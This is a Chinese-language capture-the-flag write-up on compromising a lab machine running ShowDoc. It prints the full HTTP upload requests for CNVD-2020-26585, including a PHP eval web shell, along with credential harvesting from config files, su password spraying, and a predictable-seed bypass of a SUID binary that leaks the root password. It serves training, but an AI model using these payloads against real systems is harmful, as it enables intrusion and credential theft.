![Show[MazeSec]](https://gitlab.com/aristorechina/blog_imgur/-/raw/main/2025/ctf_writeup_cover_2dcbf3013efda15f.gif)
信息收集
bash
rustscan -a 192.168.5.137 --ulimit 5000 -- -sV -sC.----. .-. .-. .----..---. .----. .---. .--. .-. .-.| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| || .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'The Modern Day Port Scanner.________________________________________: http://discord.skerritt.blog :: https://github.com/RustScan/RustScan : --------------------------------------Nmap? More like slowmap.🐢 [~] The config file is expected to be at "C:\\Users\\Administrator\\.rustscan.toml"Open 192.168.5.137:22Open 192.168.5.137:80[~] Starting Script(s)[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sV -sC" on ip 192.168.5.137Depending on the complexity of the script, results may take some time to appear.[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-27 20:13 +0800NSE: Loaded 158 scripts for scanning.NSE: Script Pre-scanning.NSE: Starting runlevel 1 (of 3) scan.Initiating NSE at 20:13Completed NSE at 20:13, 0.00s elapsedNSE: Starting runlevel 2 (of 3) scan.Initiating NSE at 20:13Completed NSE at 20:13, 0.00s elapsedNSE: Starting runlevel 3 (of 3) scan.Initiating NSE at 20:13Completed NSE at 20:13, 0.00s elapsedInitiating ARP Ping Scan at 20:13Scanning 192.168.5.137 [1 port]Completed ARP Ping Scan at 20:13, 1.41s elapsed (1 total hosts)Nmap scan report for 192.168.5.137 [host down, received no-response]NSE: Script Post-scanning.NSE: Starting runlevel 1 (of 3) scan.Initiating NSE at 20:13Completed NSE at 20:13, 0.00s elapsedNSE: Starting runlevel 2 (of 3) scan.Initiating NSE at 20:13Completed NSE at 20:13, 0.00s elapsedNSE: Starting runlevel 3 (of 3) scan.Initiating NSE at 20:13Completed NSE at 20:13, 0.00s elapsedRead data files from: D:\NmapNote: Host seems down. If it is really up, but blocking our ping probes, try -PnNmap done: 1 IP address (0 hosts up) scanned in 2.13 seconds Raw packets sent: 2 (56B) | Rcvd: 0 (0B)俩端口挺正常,没开什么奇奇怪怪的服务,80 端口运行的是 ShowDoc
搜了一下漏洞发现这篇 PoC vulhub/showdoc/CNVD-2020-26585/README.zh-cn.md at master · vulhub/vulhub
http
POST /index.php?s=/home/page/uploadImg HTTP/1.1Host: 192.168.5.137Accept-Encoding: gzip, deflate, brAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36Connection: closeCache-Control: max-age=0Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0RdOKBR8AmAxfRylContent-Length: 213 ------WebKitFormBoundary0RdOKBR8AmAxfRylContent-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"Content-Type: text/plain <?=phpinfo();?>------WebKitFormBoundary0RdOKBR8AmAxfRyl--测试了一下发现可用后改成一句话木马
http
POST /index.php?s=/home/page/uploadImg HTTP/1.1Host: 192.168.5.137Accept-Encoding: gzip, deflate, brAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36Connection: closeCache-Control: max-age=0Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0RdOKBR8AmAxfRylContent-Length: 213 ------WebKitFormBoundary0RdOKBR8AmAxfRylContent-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"Content-Type: text/plain <?php @eval($_POST['cmd']);?>------WebKitFormBoundary0RdOKBR8AmAxfRyl--返回:
http
HTTP/1.1 200 OKDate: Mon, 27 Apr 2026 12:37:23 GMTServer: Apache/2.4.66 (Debian)Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: PHPSESSID=hh6d3b876l96i3rjn2s17ovkcp; path=/Vary: Accept-EncodingConnection: closeContent-Type: text/html; charset=utf-8Content-Length: 92 {"url":"http:\/\/192.168.5.137\/Public\/Uploads\/2026-04-27\/69ef5883df369.php","success":1}蚁剑连上之后写反弹 shell 并稳定 shell
bash
www-data@Show:/$ iduid=33(www-data) gid=33(www-data) groups=33(www-data)检查所有配置文件:
bash
www-data@Show:~/html$ find . -name "*.php" -o -name "*.conf" -o -name "*.ini" -o -name "config*" | xargs grep -i "password\|passwd\|pwd" 2>/dev/null..../install/lang.en.php: "install_success_help"=>'Installation success!The password of the default administrator account is showdoc/123456 ,After login, you can see the management backstage access in the upper right corner.In addition, it is strongly recommended to modify the administrator password .<br>More help :<a href="https://www.showdoc.cc/help-en" target="_blank">https://www.showdoc.cc/help-en</a>',..../server/Application/Common/Conf/config.php: 'DB_PWD' => 'showdoc123456',...发现默认管理员账号是 showdoc/123456(在 install/lang.en.php),数据库密码是 showdoc123456(在 server/Application/Common/Conf/config.php)
查看有哪些用户
bash
www-data@Show:~/html$ ls /home -altotal 16drwxr-xr-x 4 root root 4096 Apr 25 20:07 .drwxr-xr-x 18 root root 4096 Apr 25 06:18 ..drwx------ 2 l1qin9 l1qin9 4096 Apr 25 22:47 l1qin9drwx------ 2 mooi mooi 4096 Apr 25 20:09 mooi横向移动
用前面收集到的信息作为密码爆破
bash
www-data@Show:~$ echo "123456" | su l1qin9 -c "id" 2>&1Password: su: Authentication failurewww-data@Show:~$ echo "showdoc123456" | su l1qin9 -c "id" 2>&1Password: uid=1001(l1qin9) gid=1001(l1qin9) groups=1001(l1qin9),100(users)www-data@Show:~$ echo "showdoc" | su l1qin9 -c "id" 2>&1Password: su: Authentication failurewww-data@Show:~$ echo "password" | su l1qin9 -c "id" 2>&1Password: su: Authentication failurewww-data@Show:~$ echo "123456" | su mooi -c "id" 2>&1Password: su: Authentication failurewww-data@Show:~$ echo "showdoc123456" | su mooi -c "id" 2>&1Password: uid=1000(mooi) gid=1000(mooi) groups=1000(mooi),100(users)发现用户 l1qin9 和 mooi 的密码均为 showdoc123456
bash
l1qin9@Show:~$ iduid=1001(l1qin9) gid=1001(l1qin9) groups=1001(l1qin9),100(users)l1qin9@Show:~$ ls -altotal 40drwx------ 2 l1qin9 l1qin9 4096 Apr 25 22:47 .drwxr-xr-x 4 root root 4096 Apr 25 20:07 ..-rwsr-sr-x 1 root root 16632 Apr 25 22:43 auth_monitorlrwxrwxrwx 1 root root 9 Apr 25 22:47 .bash_history -> /dev/null-rw-r--r-- 1 l1qin9 l1qin9 220 Apr 25 20:07 .bash_logout-rw-r--r-- 1 l1qin9 l1qin9 3526 Apr 25 20:07 .bashrc-rw-r--r-- 1 l1qin9 l1qin9 807 Apr 25 20:07 .profilebash
mooi@Show:~$ iduid=1000(mooi) gid=1000(mooi) groups=1000(mooi),100(users)mooi@Show:~$ ls -altotal 24drwx------ 2 mooi mooi 4096 Apr 25 20:09 .drwxr-xr-x 4 root root 4096 Apr 25 20:07 ..-rw-r--r-- 1 mooi mooi 220 Apr 25 20:07 .bash_logout-rw-r--r-- 1 mooi mooi 3526 Apr 25 20:07 .bashrc-rw-r--r-- 1 mooi mooi 807 Apr 25 20:07 .profile-rw-r--r-- 1 root root 44 Apr 25 20:09 user.txtmooi@Show:~$ cat user.txtflag{user-f5ce64ad520f46e2bcb1dc94dbb6dbd3}提权
前面横向到 l1qin9 的时候就发现了一个 SUID 文件 auth_monitor
SSH 连接靶机把它取出来逆向分析
核心代码如下:
c
int __fastcall main(int argc, const char **argv, const char **envp){ int v3; time_t v4; char s[256]; int v7; unsigned int buf; FILE *stream; int v10; int fd; int i; unsigned int v13; // 生成随机挑战值 fd = open("/dev/urandom", 0, envp); if (fd < 0) { v3 = time(0); buf = v3 ^ getpid(); } else { read(fd, &buf, 4u); close(fd); } // 计算种子值 v13 = 0; for (i = 0; i <= 99; ++i) { v13 += buf % (i + 1); v13 ^= **argv; } // 初始化随机数生成器 s0rand(v13); // 生成验证码 v10 = rand(); // 输出界面 puts("--- MAZE-SEC ACCESS MONITOR ---"); v4 = time(0); printf("SYSTEM_TICK: %ld\n", v4); printf("CHALLENGE_STAMP: %08x\n", buf); printf("ENTER ACCESS CODE: "); // 验证 if (__isoc99_scanf("%d", &v7) != 1) return 1; if (v10 == v7) { // 提权到 root setuid(0); setgid(0); // 读取 root 用户的密码 stream = fopen("/root/show.txt", "r"); if (stream) { while (fgets(s, 256, stream)) printf("%s", s); fclose(stream); } } else { puts("ACCESS DENIED."); } return 0;}这个程序的问题在随机数的生成上
c
void s0rand() { srand(0x539u); // 固定种子 0x539 = 1337}s0rand() 固定使用 srand(0x539),传入的参数 v13 没有被用上所以完全不用考虑,种子固定后返回值也固定,所以可以直接计算验证码
bash
l1qin9@Show:~$ python3 -c "import ctypeslibc = ctypes.CDLL('libc.so.6')libc.srand(0x539)print(libc.rand())"292616681l1qin9@Show:~$ ./auth_monitor--- MAZE-SEC ACCESS MONITOR ---SYSTEM_TICK: 1777300428CHALLENGE_STAMP: 3eaff99cENTER ACCESS CODE: 2926166811NOjcN9b9uqUJ0VPYbgil1qin9@Show:~$ su rootPassword: 1NOjcN9b9uqUJ0VPYbgiroot@Show:/home/l1qin9# cdroot@Show:~# cat root.txtflag{root-64f26bcf00751fcbe2d03d5a7d7c93ef}